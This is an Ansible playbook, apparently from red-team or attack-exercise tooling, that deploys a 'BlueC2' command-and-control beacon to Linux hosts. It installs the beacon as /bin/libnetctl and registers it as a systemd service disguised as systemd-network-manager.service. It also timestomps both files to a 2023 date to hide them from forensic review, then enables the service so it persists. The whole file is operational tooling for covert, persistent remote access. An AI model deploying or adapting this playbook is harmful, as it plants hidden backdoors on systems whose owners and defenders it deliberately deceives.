- name: BlueC2 Deploy
  hosts: linux
  vars:
    beacon_path: "/opt/BlueC2Client/beacon.py"
    service_path: "/opt/BlueC2Client/systemd-network-manager.service"
  become: yes
  tasks:

  - name: Download Beacon
    ansible.builtin.copy:
      src: "{{ beacon_path }}"
      dest: /bin/libnetctl
      mode: 0711

  - name: Timestomp beacon
    ansible.builtin.file:
      path: /bin/libnetctl
      modification_time: '2023-01-01 12:34:51'
      access_time: '2023-01-01 12:34:51'

  - name: Download Service
    ansible.builtin.copy:
      src: "{{ service_path }}"
      dest: /lib/systemd/system/systemd-network-manager.service
      mode: 0644

  - name: Timestomp service 
    ansible.builtin.file:
      path: /lib/systemd/system/systemd-network-manager.service
      modification_time: '2023-01-01 12:34:51'
      access_time: '2023-01-01 12:34:51'

  - name : Pip Downloads
    ansible.builtin.pip:
      name: pycryptodome
      state: present

  - name: Daemon Reload
    ansible.builtin.systemd_service:
      daemon_reload: yes

  - name: Enable Service
    ansible.builtin.systemd_service:
      name: systemd-network-manager.service
      enabled: yes
      state: started

  

